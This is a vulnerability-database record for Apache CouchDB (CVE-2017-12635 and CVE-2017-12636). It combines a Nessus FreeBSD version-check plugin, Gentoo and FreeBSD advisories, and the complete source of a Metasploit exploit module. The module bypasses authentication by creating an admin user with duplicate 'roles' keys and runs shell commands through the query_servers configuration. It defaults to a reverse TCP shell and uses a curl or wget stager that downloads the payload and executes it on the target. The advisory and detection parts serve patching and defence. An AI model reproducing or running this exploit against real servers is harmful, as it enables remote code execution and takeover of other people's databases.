script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache CouchDB Arbitrary Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:couchdb\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"couchdb<1.7.2,2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2017-11-20T00:35:59", "references": ["https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-12635", "https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-12636", "https://bugs.gentoo.org/show_bug.cgi?id=637516"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "1.7.1", "arch": "all", "packageName": "dev-db/couchdb", "packageFilename": "UNKNOWN", "operator": "lt"}], "description": "### Background\n\nApache CouchDB is a distributed, fault-tolerant and schema-free document-oriented database. \n\n### Description\n\nMultiple vulnerabilities have been discovered in CouchDB. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could execute arbitrary shell commands or escalate privileges. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll CouchDB users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-db/couchdb-1.7.1\"", "edition": 1, "reporter": "Gentoo Foundation", "published": "2017-11-19T00:00:00", "title": "CouchDB: Multiple vulnerabilities", "type": "gentoo", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-12635", "CVE-2017-12636"], "modified": "2017-11-19T00:00:00", "href": "https://security.gentoo.org/glsa/201711-16", "id": "GLSA-201711-16", "cvss": {"score": 0.0, "vector": "NONE"}}], "metasploit": [{"lastseen": "2018-08-24T23:33:02", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"], "references": [], "description": "CouchDB administrative users can configure the database server via HTTP(S). Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB. This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as the CouchDB user, including downloading and executing scripts from the public internet.", "reporter": "Rapid7", "published": "2018-03-27T09:43:03", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/http/apache_couchdb_cmd_exec.rb", "type": "metasploit", "title": "Apache CouchDB Arbitrary Command Execution", "enchantments": {"score": {"modified": "2018-08-24T23:33:02", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-12635", "CVE-2017-12636"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2018-08-10T04:34:03", "metasploitReliability": "Excellent", "id": "MSF:EXPLOIT/LINUX/HTTP/APACHE_COUCHDB_CMD_EXEC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apache CouchDB Arbitrary Command Execution',\n 'Description' => %q{\n CouchDB administrative users can configure the database server via HTTP(S).\n Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB.\n This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as the CouchDB user,\n including downloading and executing scripts from the public internet.\n },\n 'Author' => [\n 'Max Justicz', # CVE-2017-12635 Vulnerability discovery\n 'Joan Touzet', # CVE-2017-12636 Vulnerability discovery\n 'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module\n ],\n 'References' => [\n ['CVE', '2017-12636'],\n ['CVE', '2017-12635'],\n ['URL', 'https://justi.cz/security/2017/11/14/couchdb-rce-npm.html'],\n ['URL', 'http://docs.couchdb.org/en/latest/cve/2017-12636.html'],\n ['URL', 'https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E']\n ],\n 'DisclosureDate' => 'Apr 6 2016',\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/shell_reverse_tcp',\n 'CMDSTAGER::FLAVOR' => 'curl'\n },\n 'CmdStagerFlavor' => ['curl', 'wget'],\n 'Targets' => [\n ['Automatic', {}],\n ['Apache CouchDB version 1.x', {}],\n ['Apache CouchDB version 2.x', {}]\n ],\n 'DefaultTarget' => 0\n ))\n\n register_options([\n Opt::RPORT(5984),\n OptString.new('URIPATH', [false, 'The URI to use for this exploit to download and execute. (default is random)']),\n OptString.new('HttpUsername', [false, 'The username to login as']),\n OptString.new('HttpPassword', [false, 'The password to login with'])\n ])\n\n register_advanced_options([\n OptInt.new('Attempts', [false, 'The number of attempts to execute the payload.']),\n OptString.new('WritableDir', [true, 'Writable directory to write temporary payload on disk.', '/tmp'])\n ])\n end\n\n def post_auth?\n true\n end\n\n def default_cred?\n true\n end\n\n def check\n get_version\n version = Gem::Version.new(@version)\n return CheckCode::Unknown if version.version.empty?\n vprint_status \"Found CouchDB version #{version}\"\n\n return CheckCode::Appears if version < Gem::Version.new('1.7.0') || version.between?(Gem::Version.new('2.0.0'), Gem::Version.new('2.1.0'))\n\n CheckCode::Safe\n end\n\n def exploit\n fail_with(Failure::Unknown, \"Something went horribly wrong and we couldn't continue to exploit.\") unless get_version\n version = @version\n\n vprint_good(\"#{peer} - Authorization bypass successful\") if auth_bypass\n\n print_status(\"Generating #{datastore['CMDSTAGER::FLAVOR']} command stager\")\n @cmdstager = generate_cmdstager(\n temp: datastore['WritableDir'],\n file: File.basename(cmdstager_path)\n ).join(';')\n\n register_file_for_cleanup(cmdstager_path)\n\n if !datastore['Attempts'] || datastore['Attempts'] <= 0\n attempts = 1\n else\n attempts = datastore['Attempts']\n end\n\n attempts.times do |i|\n print_status(\"#{peer} - The #{i + 1} time to exploit\")\n send_payload(version)\n Rex.sleep(5)\n # break if we get the shell\n break if session_created?\n end\n end\n\n # CVE-2017-12635\n # The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON,\n # the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization\n # for the newly created user.\n def auth_bypass\n username = datastore['HttpUsername'] || Rex::Text.rand_text_alpha_lower(4..12)\n password = datastore['HttpPassword'] || Rex::Text.rand_text_alpha_lower(4..12)\n @auth = basic_auth(username, password)\n\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, \"/_users/org.couchdb.user:#{username}\"),\n 'method' => 'PUT',\n 'ctype' => 'application/json',\n 'data' => %({\"type\": \"user\",\"name\": \"#{username}\",\"roles\": [\"_admin\"],\"roles\": [],\"password\": \"#{password}\"})\n )\n\n if res && (res.code == 200 || res.code == 201) && res.get_json_document['ok']\n return true\n else\n return false\n end\n end\n\n def get_version\n @version = nil\n\n begin\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path),\n 'method' => 'GET',\n 'authorization' => @auth\n )\n rescue Rex::ConnectionError\n vprint_bad(\"#{peer} - Connection failed\")\n return false\n end\n\n unless res\n vprint_bad(\"#{peer} - No response, check if it is CouchDB. \")\n return false\n end\n\n if res && res.code == 401\n print_bad(\"#{peer} - Authentication required.\")\n return false\n end\n\n if res && res.code == 200\n res_json = res.get_json_document\n\n if res_json.empty?\n vprint_bad(\"#{peer} - Cannot parse the response, seems like it's not CouchDB.\")\n return false\n end\n\n @version = res_json['version'] if res_json['version']\n return true\n end\n\n vprint_warning(\"#{peer} - Version not found\")\n return true\n end\n\n def send_payload(version)\n vprint_status(\"#{peer} - CouchDB version is #{version}\") if version\n\n version = Gem::Version.new(@version)\n if version.version.empty?\n vprint_warning(\"#{peer} - Cannot retrieve the version of CouchDB.\")\n # if target set Automatic, exploit failed.\n if target == targets[0]\n fail_with(Failure::NoTarget, \"#{peer} - Couldn't retrieve the version automaticly, set the target manually and try again.\")\n elsif target == targets[1]\n payload1\n elsif target == targets[2]\n payload2\n end\n elsif version < Gem::Version.new('1.7.0')\n payload1\n elsif version.between?(Gem::Version.new('2.0.0'), Gem::Version.new('2.1.0'))\n payload2\n elsif version >= Gem::Version.new('1.7.0') || Gem::Version.new('2.1.0')\n fail_with(Failure::NotVulnerable, \"#{peer} - The target is not vulnerable.\")\n end\n end\n\n # Exploit with multi requests\n # payload1 is for the version of couchdb below 1.7.0\n def payload1\n rand_cmd1 = Rex::Text.rand_text_alpha_lower(4..12)\n rand_cmd2 = Rex::Text.rand_text_alpha_lower(4..12)\n rand_db = Rex::Text.rand_text_alpha_lower(4..12)\n rand_doc = Rex::Text.rand_text_alpha_lower(4..12)\n rand_hex = Rex::Text.rand_text_hex(32)\n rand_file = \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8..16)}\"\n\n register_file_for_cleanup(rand_file)\n\n send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, \"/_config/query_servers/#{rand_cmd1}\"),\n 'method' => 'PUT',\n 'authorization' => @auth,\n 'data' => %(\"echo '#{@cmdstager}' > #{rand_file}\")\n )\n\n send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}\"),\n 'method' => 'PUT',\n 'authorization' => @auth\n )\n\n send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/#{rand_doc}\"),\n 'method' => 'PUT',\n 'authorization' => @auth,\n 'data' => %({\"_id\": \"#{rand_hex}\"})\n )\n\n send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_temp_view?limit=20\"),\n 'method' => 'POST',\n 'authorization' => @auth,\n 'ctype' => 'application/json',\n 'data' => %({\"language\":\"#{rand_cmd1}\",\"map\":\"\"})\n )\n\n send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, \"/_config/query_servers/#{rand_cmd2}\"),\n 'method' => 'PUT',\n 'authorization' => @auth,\n 'data' => %(\"/bin/sh #{rand_file}\")\n )\n\n send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_temp_view?limit=20\"),\n 'method' => 'POST',\n 'authorization' => @auth,\n 'ctype' => 'application/json',\n 'data' => %({\"language\":\"#{rand_cmd2}\",\"map\":\"\"})\n )\n end\n\n # payload2 is for the version of couchdb below 2.1.1\n def payload2\n rand_cmd1 = Rex::Text.rand_text_alpha_lower(4..12)\n rand_cmd2 = Rex::Text.rand_text_alpha_lower(4..12)\n rand_db = Rex::Text.rand_text_alpha_lower(4..12)\n rand_doc = Rex::Text.rand_text_alpha_lower(4..12)\n rand_tmp = Rex::Text.rand_text_alpha_lower(4..12)\n rand_hex = Rex::Text.rand_text_hex(32)\n rand_file = \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8..16)}\"\n\n register_file_for_cleanup(rand_file)\n\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, \"/_membership\"),\n 'method' => 'GET',\n 'authorization' => @auth\n )\n\n node = res.get_json_document['all_nodes'][0]\n\n send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, \"/_node/#{node}/_config/query_servers/#{rand_cmd1}\"),\n 'method' => 'PUT',\n 'authorization' => @auth,\n 'data' => %(\"echo '#{@cmdstager}' > #{rand_file}\")\n )\n\n send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}\"),\n 'method' => 'PUT',\n 'authorization' => @auth\n )\n\n send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/#{rand_doc}\"),\n 'method' => 'PUT',\n 'authorization' => @auth,\n 'data' => %({\"_id\": \"#{rand_hex}\"})\n )\n\n send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_design/#{rand_tmp}\"),\n 'method' => 'PUT',\n 'authorization' => @auth,\n 'ctype' => 'application/json',\n 'data' => %({\"_id\":\"_design/#{rand_tmp}\",\"views\":{\"#{rand_db}\":{\"map\":\"\"} },\"language\":\"#{rand_cmd1}\"})\n )\n\n send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, \"/_node/#{node}/_config/query_servers/#{rand_cmd2}\"),\n 'method' => 'PUT',\n 'authorization' => @auth,\n 'data' => %(\"/bin/sh #{rand_file}\")\n )\n\n send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_design/#{rand_tmp}\"),\n 'method' => 'PUT',\n 'authorization' => @auth,\n 'ctype' => 'application/json',\n 'data' => %({\"_id\":\"_design/#{rand_tmp}\",\"views\":{\"#{rand_db}\":{\"map\":\"\"} },\"language\":\"#{rand_cmd2}\"})\n )\n end\n\n def cmdstager_path\n @cmdstager_path ||=\n \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8)}\"\n end\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/apache_couchdb_cmd_exec.rb"}], "freebsd": [{"lastseen": "2018-08-31T01:13:39", "references": ["https://blog.couchdb.org/2018/07/10/cve-2018-8007/", "https://blog.couchdb.org/2017/11/14/apache-couchdb-cve-2017-12635-and-cve-2017-12636/", "https://lists.apache.org/thread.html/6fa798e96686b7b0013ec2088140d00aeb7d34487d3f5ad032af6934@%3Cdev.couchdb.apache.org%3E"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.7.2,2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "couchdb", "operator": "lt"}], "description": "\nApache CouchDB PMC reports:\n\nDatabase Administrator could achieve privilege escalation to\n\t the account that CouchDB runs under, by abusing insufficient validation\n\t in the HTTP API, escaping security controls implemented in previous\n\t releases.\n\n", "edition": 4, "reporter": "FreeBSD", "published": "2017-11-14T00:00:00", "title": "couchdb -- multiple vulnerabilities", "type": "freebsd", "enchantments": {"score": {"modified": "2018-08-31T01:13:39", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2018-8007", "CVE-2017-12635", "CVE-2017-12636"], "modified": "2017-11-14T00:00:00", "id": "1E54D140-8493-11E8-A795-0028F8D09152", "href": "https://vuxml.freebsd.org/freebsd/1e54d140-8493-11e8-a795-0028f8d09152.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
